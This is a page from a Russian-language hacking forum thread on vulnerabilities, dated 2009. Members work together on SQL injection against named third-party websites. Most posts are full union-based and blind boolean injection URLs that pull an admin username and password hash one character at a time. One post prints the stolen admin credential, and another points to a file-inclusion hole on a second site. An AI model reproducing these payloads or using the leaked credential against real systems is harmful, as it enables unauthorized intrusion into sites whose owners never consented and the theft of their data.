ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
 
Страница 614 из 1393 « Первая < 114514564604 610 611 612 613 614 615 616 617 618 6246647141114 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #6131  
Старый 23.03.2009, 01:03
ПаВлУшКа
Новичок
Регистрация: 08.02.2009
Сообщений: 24
Провел на форуме:
81772

Репутация: 10
Отправить сообщение для ПаВлУшКа с помощью ICQ
По умолчанию
вот, наткнулся на это
Код:
http://www.fibromyalgiareveal.com/resources/browse.php?id=-1+union+select+1,2
Unknown column 'Status' in 'field list'

А если делать запросы следующих видов:

Код:
http://www.fibromyalgiareveal.com/resources/browse.php?id=-1+union+select+1,2--
Код:
http://www.fibromyalgiareveal.com/resources/browse.php?id=-1+union+select+1,2,3
Код:
http://www.fibromyalgiareveal.com/resources/browse.php?id=-1+union+select+1
Выдает:The used SELECT statements have a different number of columns


Не первый раз такое встречается, кто-нить знает, как это раскрутить?
 

  #6132  
Старый 23.03.2009, 01:12
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию
ПаВлУшКа,

http://www.fibromyalgiareveal.com/resources/browse.php?id=2+and+ascii(substring((select+concat _ws(0x2F,username,password)+from+admin+limit+0,1), 3,1))>1
 

  #6133  
Старый 23.03.2009, 01:26
ПаВлУшКа
Новичок
Регистрация: 08.02.2009
Сообщений: 24
Провел на форуме:
81772

Репутация: 10
Отправить сообщение для ПаВлУшКа с помощью ICQ
По умолчанию
ElteRUS, это блинда чтоли? ТВой завпрос тоже ошибку выдает, как версию узнать для начала?
 

  #6134  
Старый 23.03.2009, 01:31
DimOnOID
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
Провел на форуме:
11338585

Репутация: 441
Отправить сообщение для DimOnOID с помощью ICQ
По умолчанию
Цитата:
Сообщение от ПаВлУшКа  
ElteRUS, это блинда чтоли? ТВой завпрос тоже ошибку выдает, как версию узнать для начала?
http://www.fibromyalgiareveal.com/resources/browse.php?id=2+and+substring(version(),1,1)=4
http://www.fibromyalgiareveal.com/resources/browse.php?id=2+and+substring(version(),1,1)=5
4
А в его запросе-Просто пробелы убери.
 

  #6135  
Старый 23.03.2009, 01:37
ph1l1ster
Постоянный
Регистрация: 11.03.2008
Сообщений: 347
Провел на форуме:
2075230

Репутация: 462
Отправить сообщение для ph1l1ster с помощью ICQ
По умолчанию
Цитата:
Сообщение от ПаВлУшКа  
ElteRUS, это блинда чтоли? ТВой завпрос тоже ошибку выдает, как версию узнать для начала?
Вытягивай имя:

Код:
http://www.fibromyalgiareveal.com/resources/browse.php?id=2+and+ascii(substring((select+username+from+admin+limit+0,1),5,1))%3E1
5 Символов, скорей всего admin

пасс:

Код:
http://www.fibromyalgiareveal.com/resources/browse.php?id=2+and+ascii(substring((select+password+from+admin+limit+0,1),32,1))%3E1
32 симола - хэш
 

  #6136  
Старый 23.03.2009, 02:24
ph1l1ster
Постоянный
Регистрация: 11.03.2008
Сообщений: 347
Провел на форуме:
2075230

Репутация: 462
Отправить сообщение для ph1l1ster с помощью ICQ
По умолчанию
ПаВлУшКа
admin:3271d6889498c22a81b51aba93dc9307
 

  #6137  
Старый 23.03.2009, 02:38
ПаВлУшКа
Новичок
Регистрация: 08.02.2009
Сообщений: 24
Провел на форуме:
81772

Репутация: 10
Отправить сообщение для ПаВлУшКа с помощью ICQ
По умолчанию
ph1l1ster, а как ты хеш узнал? Я правильно понял:
http://www.fibromyalgiareveal.com/resources/browse.php?id=2+and+ascii(substring((select+userna me+from+admin+limit+0,1),5,1))%3E1

Проверяет, если usermane содержит 5 и меньше символов, то выводится страница, а если больше, то ошибка??
 

  #6138  
Старый 23.03.2009, 02:45
ph1l1ster
Постоянный
Регистрация: 11.03.2008
Сообщений: 347
Провел на форуме:
2075230

Репутация: 462
Отправить сообщение для ph1l1ster с помощью ICQ
По умолчанию
ПаВлУшКа
http://www.fibromyalgiareveal.com/resources/browse.php?id=2+and+ascii(substring((select+userna me+from+admin+limit+0,1),1,1))=97
первый символ ascii: 97 char: a

http://www.fibromyalgiareveal.com/resources/browse.php?id=2+and+ascii(substring((select+userna me+from+admin+limit+0,1),2,1))=100
второй символ ascii: 100 char:d

http://www.fibromyalgiareveal.com/resources/browse.php?id=2+and+ascii(substring((select+userna me+from+admin+limit+0,1),3,1))=109
третий символ ascii: 109 char: m

и тд.
 

  #6139  
Старый 23.03.2009, 17:02
HIVER
Познающий
Регистрация: 28.10.2008
Сообщений: 43
Провел на форуме:
117557

Репутация: 125
По умолчанию
_http://top.warlib.ru/index.php?cid=1'/*

так же здесь есть инклуд:
_http://www.warlib.ru/index.php?id[]=000117

Раскручивание на замену нулл-байту ничего не дало, может у кого получится)
Последний раз редактировалось HIVER; 23.03.2009 в 17:06..
 

  #6140  
Старый 23.03.2009, 17:16
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию
Код:
http://top.warlib.ru/index.php?cid=1+and+substring(version(),1,1)=5
HIVER, пятая ветка.
 
 
Страница 614 из 1393 « Первая < 114514564604 610 611 612 613 614 615 616 617 618 6246647141114 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ